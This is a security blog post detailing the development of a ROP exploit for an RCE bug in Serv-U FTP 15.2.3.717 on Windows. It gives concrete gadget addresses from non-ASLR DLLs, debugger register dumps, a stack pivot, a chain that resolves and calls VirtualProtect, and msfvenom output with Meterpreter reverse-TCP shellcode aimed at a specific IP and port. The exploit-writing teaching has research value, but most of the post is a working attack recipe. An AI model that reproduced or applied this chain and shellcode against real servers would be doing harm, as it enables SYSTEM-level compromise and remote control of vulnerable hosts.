As part of our work on the Cosmos platform (formerly known as CAST) we sometimes have a requirement to weaponize vulnerabilities in order to achieve specific customer requirements. In this case we were asked "can you guys write an exploit for this?" and we were happy to oblige.
In this blog, I'd like to share some of the thought process behind creating a ROP-based exploit for Serv-U FTP v15.2.3.717 on modern Windows systems. I'm not going to cover the root cause of the vulnerability here because the Microsoft research team did a good job of it in their blog post. Please read that article first and then come back here if you're interested in how we arrived at the point of NattiSamson's PoC and our subsequent exploit.
We pick up at the point where Natti's PoC gives us a semi-reliable way to populate the r9 register with an attacker-supplied value that is subsequently used by a call r9 instruction. This gives us a way to control rip and theoretically execute arbitrary code in the context of Serv-U, which typically runs as a service as NT AUTHORITY\System.
We'll keep the tooling simple. If you want to play along you'll need:
Note that I am not using Mona or other such tools to automate the exploit development process. I'm doing a lot of this manually to better demonstrate the steps involved in writing ROP exploits; perhaps in a later blog post I'll go over how to do this with automation tooling like Mona.
If you don't care about the technical details and just want to grab the exploit, it's available here.
I started with NattiSamson's PoC that triggered the bug in Serv-U and placed a user-controllable value into rip via a call r9 instruction. r9 is a QWORD (8-byte / 64-bit) register, the contents of which can be controlled by passing a carefully constructed malicious payload during the initial SSH cryptographic handshake with Serv-U.
Let's break the exploit development down into chunks. This will be a ROP exploit, loosely constructed like so:
- Put a useful address into r9 in order to kickstart code execution
- Pivot rsp to point at the ROP chain in our payload
- Locate kernel32.dll!VirtualProtect, which I'll use to make the stack executable (RWX)
- Call VirtualProtect to change the stack's page protection from RW- to RWX

I may or may not stick to that order!
The first three points above are all intertwined, so I'll deal with them at the same time. The question is: what memory address should I put into r9 in order to kickstart our ROP chain exploit? I must solve for:
- rsp must point to our ROP chain before the code reached via call r9 returns with a ret instruction. This is because of the way ret works. Think of the ret instruction as an equivalent of pop rax ; jmp rax or, more simply, pop rip, both of which pop a 64-bit address off the stack and jump to it. If you control the stack, you control the return address of every ret instruction in the future.
- If rsp doesn't point to our ROP chain by the time ret executes, I'm hosed.
- rsp does not point to our ROP chain at the time of the PoC's call r9, so our first ROP gadget must populate rsp with the address of our payload/ROP chain buffer and then execute ret.

Whew. Tricksy. Fortunately, the stars aligned on this bug and it's pretty easy to work around these problems. First up: ASLR. I can't do anything until I've worked around address space randomization.
I can't stack pivot or reliably jump to a useful instruction or pivot to a ROP chain until I've found useful non-ASLR predictable, repeatable addresses.
The first thing to do is see if Serv-U.exe or any of the bundled DLLs are compiled without ASLR support. The tool for the job is NetSPI's PESecurity, available from https://github.com/NetSPI/PESecurity. It's a PowerShell script that scans executable files for security flags and produces a concise report, like so:
PS C:\Users\Administrator\Desktop> Import-Module .\Get-PESecurity.psm1
PS C:\Users\Administrator\Desktop> Get-PESecurity -directory 'C:\Program Files\RhinoSoft\Serv-U' -recursive
FileName : C:\Program Files\RhinoSoft\Serv-U\RhinoNET.dll
ARCH : AMD64
DotNET : False
ASLR : False
DEP : True
Authenticode : False
StrongNaming : N/A
SafeSEH : N/A
ControlFlowGuard : False
HighentropyVA : True
FileName : C:\Program Files\RhinoSoft\Serv-U\RhinoRES.dll
ARCH : AMD64
DotNET : False
ASLR : False
DEP : True
Authenticode : False
StrongNaming : N/A
SafeSEH : N/A
ControlFlowGuard : False
HighentropyVA : True
FileName : C:\Program Files\RhinoSoft\Serv-U\Serv-U-RES.dll
ARCH : AMD64
DotNET : False
ASLR : False
DEP : True
Authenticode : False
StrongNaming : N/A
SafeSEH : N/A
ControlFlowGuard : False
HighentropyVA : True
FileName : C:\Program Files\RhinoSoft\Serv-U\Serv-U-Setup.exe
ARCH : AMD64
DotNET : False
ASLR : False
DEP : True
Authenticode : True
StrongNaming : N/A
SafeSEH : N/A
ControlFlowGuard : False
HighentropyVA : True
FileName : C:\Program Files\RhinoSoft\Serv-U\Serv-U-Tray.exe
ARCH : AMD64
DotNET : False
ASLR : False
DEP : True
Authenticode : True
StrongNaming : N/A
SafeSEH : N/A
ControlFlowGuard : False
HighentropyVA : True
FileName : C:\Program Files\RhinoSoft\Serv-U\Serv-U.dll
ARCH : AMD64
DotNET : False
ASLR : False
DEP : True
Authenticode : False
StrongNaming : N/A
SafeSEH : N/A
ControlFlowGuard : False
HighentropyVA : True
FileName : C:\Program Files\RhinoSoft\Serv-U\zlib1.dll
ARCH : AMD64
DotNET : False
ASLR : False
DEP : True
Authenticode : False
StrongNaming : N/A
SafeSEH : N/A
ControlFlowGuard : False
HighentropyVA : True
Holy smokes, that's a lot of non-ASLR binaries! For shame, SolarWinds. This means that Serv-U.dll, etc. will always be loaded into the same memory addresses, which means that I have reliable addresses from which to harvest ROP gadgets.
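For readers curious where a report like the one above comes from, here is a minimal Python sketch that reads the same mitigation bits straight out of a PE header. It relies only on the documented PE layout (the DllCharacteristics word sits 70 bytes into the optional header for both PE32 and PE32+); it is not how PESecurity itself is implemented, and the function names are my own.

```python
import struct

# Bit flags in the PE optional header's DllCharacteristics field.
HIGH_ENTROPY_VA = 0x0020
DYNAMIC_BASE = 0x0040   # image opted in to ASLR
NX_COMPAT = 0x0100      # image opted in to DEP
GUARD_CF = 0x4000       # image built with Control Flow Guard


def dll_characteristics(image: bytes) -> int:
    """Return the DllCharacteristics word of a PE image held in memory."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    # e_lfanew at offset 0x3C holds the file offset of the PE signature.
    (pe_offset,) = struct.unpack_from("<I", image, 0x3C)
    if image[pe_offset:pe_offset + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    # Skip the 4-byte signature and the 20-byte COFF header.
    optional_header = pe_offset + 4 + 20
    (flags,) = struct.unpack_from("<H", image, optional_header + 70)
    return flags


def mitigations(flags: int) -> dict:
    """Translate the flag word into the fields PESecurity-style reports show."""
    return {
        "ASLR": bool(flags & DYNAMIC_BASE),
        "HighEntropyVA": bool(flags & HIGH_ENTROPY_VA),
        "DEP": bool(flags & NX_COMPAT),
        "ControlFlowGuard": bool(flags & GUARD_CF),
    }
```

To try it on a real file, pass the file's bytes, for example `mitigations(dll_characteristics(open(path, "rb").read()))`, where `path` is whichever binary you want to inspect.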
As mentioned before, the stack pointer rsp doesn't point to our exploit payload buffer at the time call r9 happens. This breaks everything because once the code reached via r9 executes ret, the CPU will pop the return address off the stack at the address in rsp and jump to it. In other words, execution resumes as normal. I can control r9 and therefore control where the call jumps to, but I can't control where it returns to; I have to find a way to point rsp at our payload and return to our ROP chain using only a single ROP gadget.
It turns out that rbp holds the address of our payload. How do I know that? By examining the registers and the stack in a debugger at the point call r9 is executed by the CPU.
First the registers:
0:008> r
00 0000000d`09bfebf0 00000000`72111cb8 LIBEAY32!CRYPTO_ctr128_encrypt+0xc6
rax=0000000000000010 rbx=000001ed4d497f00 rcx=000001ed4d9126b8
rdx=000001ed4d9126c8 rsi=ffffffffffb627a8 rdi=0000000000000000
rip=00000000720b9636 rsp=0000000d09bfebf0 rbp=000001ed4d5a410a
 r8=000001ed4d497f00  r9=4141414141414100 r10=000001ed4d497f00
r11=000001ed4d5a40fa r12=000001ed4d9126c8 r13=0000000000000001
r14=ffffffffffc91a32 r15=000001ed4d474e80
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
LIBEAY32!CRYPTO_ctr128_encrypt+0xc6:
00000000`720b9636 41ffd1 call r9 {41414141`41414141}
We can see that the stack pointer and base pointer are nowhere near each other:
rsp = 0x00d09bfebf0
rbp = 0x1ed4d5a410a
There was nothing of our payload at rsp's memory address, but what about rbp?
0:013> db @rbp l128
00000253`5badfa9a 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000253`5badfaaa 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000253`5badfaba 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000253`5badfaca 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000253`5badfada 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000253`5badfaea 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000253`5badfafa 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000253`5badfb0a 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000253`5badfb1a 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000253`5badfb2a 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000253`5badfb3a 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000253`5badfb4a 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000253`5badfb5a 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000253`5badfb6a 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000253`5badfb7a 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000253`5badfb8a 41 41 41 41 41 41 41 41-00 00 00 00 00 00 00 00 AAAAAAAA........
00000253`5badfb9a 00 00 00 00 00 00 00 00-00 00 00 00 00 00 73 92 ..............s.
00000253`5badfbaa bf a1 35 03 00 90 b8 34-5a 90 ff 7f 00 00 70 34 ..5....4Z.....p4
00000253`5badfbba 5a 90 ff 7f 00 00 00 22 Z......"
Bingo! So first order of the day is to move the address in rbp to rsp. To do that I need a ROP gadget that does something like:
mov rsp, rbp
ret
It's rarely that easy, but that's where we start. Using Radare2 to search for ROP gadgets is simple, particularly on architectures like Intel x64, where instructions are variable-length and can be decoded starting from any byte offset. That lets us find gadgets that aren't even part of the compiled code. It's a cool concept, check it out. Consider the following code:
0x18005d485 498be3 mov rsp, r11
0x18005d488 5d pop rbp
0x18005d489 c3 ret
The first instruction, mov rsp, r11, takes up three bytes (\x49\x8b\xe3) and starts at address 0x18005d485. Therefore, the next instruction is at an address 3 bytes higher, at 0x18005d488.
But what if I set the instruction pointer to address 0x18005d486, which is between the two "valid" instruction addresses? The opcodes would be \x8b\xe3\x5d\xc3, which is a completely different set of instructions. You can use Radare2 to disassemble these opcodes like so:
% rasm2 -a x86 -b 64 -d 8be35dc3
mov esp, ebx
pop rbp
ret
Well, look at that! A completely different gadget. You can ask Radare2 to perform gadget searches byte by byte to uncover all possible permutations of instructions by using the "/ad/a" command like this:
% r2 Serv-U.dll
-- Ask not what r2 can do for you - ask what you can do for r2
[0x1801a4184]> "/ad/a mov rsp;ret;"
[0x1801a4184]>
The above command, "/ad/a mov rsp;ret;", tells Radare2 to scan the Serv-U.dll file for instructions that match a mov followed by a ret, and in which the mov instruction is writing something to the rsp register. The stacked query terms are separated by semicolons and are expected to be regexes; the entire command must be inside double quotes.
Sadly for us, the above Radare2 search returned no results. OK, let's try to find a gadget that has some kind of mov rsp, .*, then any other instruction, and then a ret:
[0x1801a4184]> "/ad/a mov rsp;.*;ret;"
0x180059ffb 498be3 mov rsp, r11
0x180059ffe 5d pop rbp
0x180059fff c3 ret
0x18005d485 498be3 mov rsp, r11
0x18005d488 5d pop rbp
0x18005d489 c3 ret
0x18005d986 498be3 mov rsp, r11
0x18005d989 5d pop rbp
0x18005d98a c3 ret
0x18005fa9a 498be3 mov rsp, r11
0x18005fa9d 415e pop r14
0x18005fa9f c3 ret
0x180063a5a 498be3 mov rsp, r11
0x180063a5d 5f pop rdi
0x180063a5e c3 ret
0x180064795 498be3 mov rsp, r11
0x180064798 5f pop rdi
0x180064799 c3 ret
...omitted for brevity...
0x180196569 498be3 mov rsp, r11
0x18019656c 5f pop rdi
0x18019656d c3 ret
0x1801a167f 498be3 mov rsp, r11
0x1801a1682 5f pop rdi
0x1801a1683 c3 ret
That's a LOT of matching gadgets! Remember, I want to put the address of our payload into rsp. Let's rule out any gadgets where rbp is popped off the stack; I'd like to avoid messing with more stack registers than absolutely necessary. I don't care if rdi gets messed up, so those gadgets could be useful so long as r11 points to the location of our payload buffer on the stack.
To check r11's value I used WinDBG to attach to the Serv-U process and compare the value of rbp against r11 at the time call r9 is executed by the exploit:
(1c60.1c04): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
LIBEAY32!CRYPTO_ctr128_encrypt+0xc6:
00000000`720b9636 41ffd1 call r9 {41414141`41414141}
0:013> r
rax=0000000000000010 rbx=0000020058925d20 rcx=0000020058d1d688
rdx=0000020058d1d698 rsi=ffffffffffb5ee68 rdi=0000000000000000
rip=00000000720b9636 rsp=0000009dd2aff320 rbp=0000020058648b3a
 r8=0000020058925d20  r9=4141414141414141 r10=0000020058925d20
r11=0000020058648b2a r12=0000020058d1d698 r13=0000000000000001
r14=ffffffffff92b492 r15=000002005887c510
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
LIBEAY32!CRYPTO_ctr128_encrypt+0xc6:
00000000`720b9636 41ffd1 call r9 {41414141`41414141}
0:013>
We can see that:
rbp=0000020058648b3a
r11=0000020058648b2a
What good fortune! The r11 register holds an address 16 bytes (0x10) below the one in rbp, and it points exactly at our payload buffer. I can use the newly identified ROP gadget to perform the stack pivot, pop eight bytes off the "stack" (which is really our payload) into rdi, and then pop the next eight bytes off the stack into rip; given that I control the new stack, I therefore control the value of rip, which means I now have a means to pivot the stack and continue execution from our ROP chain.
I chose the gadget address of 0x18010391a from those found by Radare2. It became the value placed into the payload buffer as our first ROP gadget address.
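To make the pivot concrete, here is a toy Python model of a mov rsp, r11 ; pop rdi ; ret gadget running over a flat byte buffer. The two register values are copied from the WinDBG output; the buffer contents are placeholders I made up for illustration, and nothing here touches a real process.

```python
import struct

# Register values copied from the debugger output at the time of call r9.
rbp = 0x0000020058648B3A
r11 = 0x0000020058648B2A
delta = r11 - rbp  # negative: r11 sits below rbp


def run_pivot_gadget(memory: bytes, base: int, r11_value: int):
    """Model 'mov rsp, r11 ; pop rdi ; ret'.

    memory holds the bytes that live at address base onwards.
    Returns (rdi, rip, rsp) as they would be after the gadget's ret.
    """
    rsp = r11_value                                         # mov rsp, r11
    (rdi,) = struct.unpack_from("<Q", memory, rsp - base)   # pop rdi
    rsp += 8
    (rip,) = struct.unpack_from("<Q", memory, rsp - base)   # ret pops rip
    rsp += 8
    return rdi, rip, rsp


# Placeholder buffer: the first qword is consumed by pop rdi, the second by ret.
fake_buffer = struct.pack("<QQ", 0x4444444444444444, 0x5555555555555555)
rdi, rip, rsp = run_pivot_gadget(fake_buffer, base=r11, r11_value=r11)
```

The model shows why the first eight bytes at the pivot target are throwaway filler while the second eight bytes decide where execution goes next.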
kernel32!VirtualProtect
Now that I've pivoted the stack to our ROP buffer, I need to set up the conditions for executing shellcode. Step one: Make the memory pages in which our shellcode is stored readable, writable, and - most importantly - executable. Our shellcode is on the stack in our payload buffer, so that's what I need to make executable.
The function VirtualProtect is used to change the protection flags for regions of memory, which lets us set the stack to executable (RWX). I checked the import table of Serv-U.dll, but it didn't import VirtualProtect, so the easiest way of getting the correct address (direct reference) wouldn't work. Instead I have to use native Windows functions to derive the address by calling the equivalent of GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "VirtualProtect").
We can see from the disassembler's import tables (Navigation / Imported Symbols in Hopper) that Serv-U.dll imports GetModuleHandleW from kernel32.dll:
It also imports GetProcAddress:
The address 0x1801c92c8 is a trampoline slot built into Serv-U.dll: jumping through it redirects execution to the real kernel32!GetModuleHandleW that's been mapped into Serv-U's process space by the operating system's library loader. The same applies for 0x1801c9590 and kernel32!GetProcAddress. In other words, the value stored at address 0x1801c92c8 is a pointer to the real GetModuleHandleW function.
Let's dereference it in the debugger and double-check that it matches the real address of GetModuleHandleW in this context. First, dereference the trampoline in Serv-U.dll:
0:026> u poi(0x1801c92c8)
KERNEL32!GetModuleHandleWStub:
00007ffd`19e4ce40 48ff2559370600 jmp qword ptr [KERNEL32!_imp_GetModuleHandleW (00007ffd`19eb05a0)]
00007ffd`19e4ce47 cc int 3
Awesome. Does the same apply to GetProcAddress?
0:026> u poi(0x1801c9590)
KERNEL32!GetProcAddressStub:
00007ffd`19e4a780 4c8b0424 mov r8,qword ptr [rsp]
00007ffd`19e4a784 48ff25bd510600 jmp qword ptr [KERNEL32!_imp_GetProcAddressForCaller (00007ffd`19eaf948)]
00007ffd`19e4a78b cc int 3
Yes indeed! That has saved us a lot of hassle and I can write the ROP chain the "easy" way by calling known pointers to access the functions needed to locate VirtualProtect. In order to call the necessary functions I'll need to find some ROP gadgets that provide the necessary functionality.
I started by sketching out a rough plan of what I wanted to achieve.
moduleHandle = GetModuleHandleW(L"kernel32.dll")
VirtualProtect = GetProcAddress(moduleHandle, "VirtualProtect")
VirtualProtect(stackAddress, size, attributes, &results)
It takes a bit of trial and error to build up the gadget chain because we're often limited to less-than-perfect gadgets. So I spent some time finding useful gadgetry. What constitutes "useful"? Here are a few ideas:
- Simple gadgets. mov rax, rbx ; ret is much better than mov rax, rbx; mov rax, qword ptr [rax+10h]; pop rcx; ret because the latter stomps on the values we want and it also messes with the stack due to the pop instruction. Simple is good in ROP. But if we can't find "perfect" gadgets (i.e. those that perform only the desired operation and a ret) then we have to settle for gadgets with extra baggage.
- Gadgets that pop values off the stack into the four argument-passing registers (rcx, rdx, r8, and r9, respectively) are super useful for calling into functions. So for example these gadgets are solid gold:
pop rcx ; ret
pop rdx ; ret
pop r8 ; ret
pop r9 ; ret
- Unfortunately, there was no pop r9 gadget available. Instead, I looked for the smallest possible non-perfect gadgets to load another register with the desired value and swap it into the r9 register, like so:
pop rax ; xchg r9, rax ; ret
- Gadgets that jump or call through a register, such as jmp rax ; ret or call rbx ; ret, can be chained together like so:
pop rax
followed by
jmp rax or jmp qword ptr [rax]
- Gadgets that dereference pointers help when calling through the trampolines for GetModuleHandleW and GetProcAddress. For example: mov rax, qword ptr [rax]. Reads the value at the memory address in rax and stores it in the rax register. If rax=0x123456789 then the above instruction reads the 8 bytes at memory address 0x123456789 and stores that value in the rax register.

I spent some time collecting gadgets and then used them to construct a real ROP chain. Sometimes it doesn't work out and you need to spend forever thinking up alternative ways of doing the job. For example, I spent hours trying to find an easy way to put arbitrary values in the r9 register when calling into VirtualProtect. Eventually I settled on a two-gadget chain that populated r9 via rax, like so:
# Gadget 1
pop rax # we control the stack, so we can control the value popped into rax
ret
# Gadget 2
xchg rax, r9 # tadaaaa
adc al, 0 # Effectively a NOP without consequences
add rsp, 0x38 # Effectively a NOP with consequences: stack pointer increases by 0x38 bytes.
ret # The address popped off the stack by the ret instruction needs to be 0x38 bytes further up our payload/stack than it normally would be.
The double-gadget was a compromise because I really didn't want to have 0x38 bytes of my payload eaten up by add rsp, 0x38, but it did the job and was the best I had, so I went with it.
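The bookkeeping for that add rsp, 0x38 is easy to get wrong, so here is a small Python sketch of the stack layout the two gadgets consume. Every value below is an obvious placeholder rather than a real gadget address, and the function name is hypothetical; the point is only to show where the next return address has to sit.

```python
import struct

SKIPPED_BYTES = 0x38
FILLER_QWORDS = SKIPPED_BYTES // 8  # seven 8-byte slots are stepped over


def r9_loader_layout(pop_rax_gadget, value_for_r9, xchg_gadget, next_gadget):
    """Return the bytes consumed by the two-gadget sequence, in stack order."""
    words = [
        pop_rax_gadget,  # returned into by the previous ret
        value_for_r9,    # popped into rax by gadget 1
        xchg_gadget,     # gadget 1's ret lands here (gadget 2)
    ]
    words += [0] * FILLER_QWORDS  # skipped by 'add rsp, 0x38'
    words.append(next_gadget)     # popped by gadget 2's ret
    return struct.pack("<%dQ" % len(words), *words)


# Placeholder values only.
layout = r9_loader_layout(
    0x1111111111111111,
    0x2222222222222222,
    0x3333333333333333,
    0x4444444444444444,
)
next_offset = layout.index(struct.pack("<Q", 0x4444444444444444))
```

In this layout the follow-on return address sits 0x50 bytes from the start of the sequence: three 8-byte entries plus the 0x38 bytes of filler.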
The GetModuleHandleW function is defined as:
HMODULE GetModuleHandleW(
[in, optional] LPCWSTR lpModuleName
);
It returns a handle that identifies the module (DLL, executable, etc.) in memory. In practice the handle is the base address at which the module is loaded, so it literally points to the complete DLL in memory. The name of the module must be specified as a "wide" string, which uses 16 bits per character instead of ASCII's eight bits per character. For example:
ASCII:
"kernel32" = \x6b\x65\x72\x6e\x65\x6c\x33\x32
Wide String:
"kernel32" = \x6b\x00\x65\x00\x72\x00\x6e\x00\x65\x00\x6c\x00\x33\x00\x32\x00
Handily enough, there is a wide string version of kernel32 in the Serv-U.dll binary! It's located at 0x180313230, as shown here in Hopper:
Note that it's denoted as type dw (a sequence of 16-bit words), which is how a wide string is laid out. Checking the result in the hex editor confirms that this is really a wide string:
Excellent. All it takes to call GetModuleHandleW(L"kernel32.dll") is the following pseudo-code:
pop rcx # We place the value 0x180313230 (address of kernel32 string) on the stack to be popped into rcx
pop rax # We place the value 0x1801c92c8 (address of GetModuleHandleW trampoline) on the stack to be popped into rax
jmp [rax] # Dereference rax and jump to the resulting address, which is the real address of GetModuleHandleW
mov rcx, rax # Save the returned handle in rcx for later
The handle for kernel32.dll is returned in the rax register, which we can save for later use. In the exploit I save it into a writable area of memory in Serv-U's .data segment that I treat as a scratchpad for "variables" that hold data temporarily.
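Returning briefly to the wide-string argument that GetModuleHandleW expects, the ASCII and wide byte sequences shown earlier are easy to reproduce in Python. This is just a quick sanity check using the standard codecs; the helper name is my own.

```python
name = "kernel32"

ascii_bytes = name.encode("ascii")      # one byte per character
wide_bytes = name.encode("utf-16-le")   # two bytes per character, low byte first


def escaped(data: bytes) -> str:
    """Render bytes in the \\xNN notation used in this post."""
    return "".join("\\x%02x" % b for b in data)


print(escaped(ascii_bytes))
print(escaped(wide_bytes))
# A C-style wide string also needs a two-byte terminator (\x00\x00) after this.
```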
The GetProcAddress function is defined as:
FARPROC GetProcAddress(
[in] HMODULE hModule,
[in] LPCSTR lpProcName
);
The first parameter is the handle I obtained from GetModuleHandleW. The second is the name of the function I want to find: VirtualProtect. This time the string is expected to be ASCII, not wide. Unfortunately, there is no NULL-terminated "VirtualProtect" string in the Serv-U binaries, so I need to create my own using the stack.
The first step is to find a writable memory address in Serv-U's .data segment to which I can write a string. I used Hopper to look through the data segment for a section that was not cross-referenced to any code; the assumption is that the memory area is truly unused. Pseudo-code is as follows:
# Write "VirtualProtect\x00\x00" (16 bytes) to an unused address in .data
# Split the task so that two 8-byte chunks are written consecutively.
pop rdx # An unused address in Serv-U's data segment gets popped into rdx.
pop rax # Pop the value 0x506c617574726956 ("VirtualP" little-endian) off the stack.
mov [rdx], rax # Write "VirtualP" to the first 8 bytes of our .data memory chunk.
pop rdx # Pop the address of the next 8 bytes of .data memory into rdx.
pop rax # Pop "rotect\x00\x00" off the stack into the rax register.
mov [rdx], rax # Append "rotect\x00\x00" to our memory chunk, making a complete "VirtualProtect\x00\x00" string.
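The two 8-byte constants in that pseudo-code can be derived rather than worked out by hand. A minimal Python sketch, with a helper name of my own choosing, that splits a NUL-terminated string into little-endian 64-bit values:

```python
def to_qwords(text: bytes) -> list:
    """Pad text with NUL bytes to a multiple of 8 and split it into
    little-endian 64-bit integers, in the order they appear in memory."""
    padded = text + b"\x00" * (-len(text) % 8)
    return [
        int.from_bytes(padded[i:i + 8], "little")
        for i in range(0, len(padded), 8)
    ]


qwords = to_qwords(b"VirtualProtect\x00")
for value in qwords:
    print(hex(value))
```

The first value matches the 0x506c617574726956 constant in the pseudo-code above; the second is "rotect" followed by two NUL bytes.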
Now I can call GetProcAddress:
# Assume rcx contains the value returned by GetModuleHandleW, the handle to kernel32.dll
# Assume rdx contains the address of the string "VirtualProtect\x00"
pop rax # Pop 0x1801c9590 off the stack (the address of the GetProcAddress trampoline)
jmp [rax] # Jump to GetProcAddress(handle, "VirtualProtect\x00")
# The address of the VirtualProtect function is returned in rax
Phew! I now have the address of VirtualProtect in rax.
The VirtualProtect function is defined as:
BOOL VirtualProtect(
[in] LPVOID lpAddress, # Starting address of memory to make executable (rounded down to nearest 4k page boundary).
[in] SIZE_T dwSize, # Number of bytes to make executable (rounded up to nearest 4k page boundary).
[in] DWORD flNewProtect, # Protection flags. In this case 0x40 = RWX.
[out] PDWORD lpflOldProtect # Return results in this variable. Must be a writable memory address!
);
Remember that the parameters are passed to this function in the rcx, rdx, r8, and r9 registers, respectively. In this case:
rcx = Address of our payload buffer (i.e. the current stack address)
rdx = 0x2000 (8 KiB, or two 4 KiB memory pages)
r8 = 0x40 (readable, writable, executable)
r9 = Address from .data segment of Serv-U
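Because VirtualProtect works on whole pages, the region that actually changes is usually a little larger than the size passed in. The Python sketch below does the rounding arithmetic; the sample address is simply the r11 value from the earlier debugger session, used here as an illustrative stand-in for the buffer address.

```python
PAGE_SIZE = 0x1000  # 4 KiB pages


def affected_pages(address: int, size: int):
    """Return (start, end, page_count) for the pages that contain any byte
    in the range [address, address + size)."""
    start = address & ~(PAGE_SIZE - 1)                          # round down
    end = (address + size + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1)   # round up
    return start, end, (end - start) // PAGE_SIZE


# Illustrative address only (r11 from the WinDBG output earlier).
start, end, pages = affected_pages(0x20058648B2A, 0x2000)
print(hex(start), hex(end), pages)
```

An unaligned address plus a 0x2000 size touches three pages rather than two, which is harmless here but worth knowing when reasoning about what ends up executable.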
The second and third parameters are dead easy: Just pop them off the stack!
pop rdx # Pop 0x2000 off the stack
pop r8 # Pop 0x40 off the stack
Getting the last argument is slightly trickier because we have no pop r9 gadget to work with; instead the compound gadget is used:
# 1st gadget
pop rax # Pop writable address off the stack into rax
ret
# 2nd gadget
xchg rax, r9 # Swap rax and r9 so that r9 now contains the writable address
adc al, 0 # Extra crap instruction does effectively no operation
add rsp, 0x38 # This part of the gadget moves the stack pointer up 0x38 bytes.
# We account for this in our exploit by skipping 0x38 bytes of our
# payload buffer before writing the next value to the buffer.
ret # Return to the next gadget
Finally I populate the first parameter: the address of our stack. The gadgets aren't perfect for this operation, but they work:
# 1st gadget
push rbp # Push an address near our stack onto the head of the stack.
pop rax # Pop the address off the stack into rax so that rax now contains the address of the stack.
add byte ptr [rax], al # Effective no operation in this context
ret # Return to next gadget
# 2nd gadget
mov rcx, rax # Put the (approximate) address of the stack into rcx
ret
At this point I have populated the registers and I just need to call VirtualProtect to make our shellcode executable:
# Assuming rax points at a memory slot that holds VirtualProtect's address
# (jmp [rax] dereferences rax before jumping)
jmp [rax]
ret
And that's it! The part of the stack on which our shellcode resides is now executable.
I took standard shellcode generated by msfvenom and patched it at exploit runtime to do my bidding. For example, consider the Metasploit-compatible shellcode stager. It's generated like so:
[2021-10-19T18:47:49Z] root@h:/ehome/haggis# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.153.76.22 LPORT=443 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of c file: 2166 bytes
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b"
"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b"
"\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41"
"\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1"
"\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45"
"\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b"
"\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48"
"\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00"
"\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5"
"\x49\xbc\x02\x00\x01\xbb\xc0\x99\x4c\x16\x41\x54\x49\x89\xe4"
"\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68"
"\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a"
"\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89"
"\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5"
"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba"
"\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5"
"\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9"
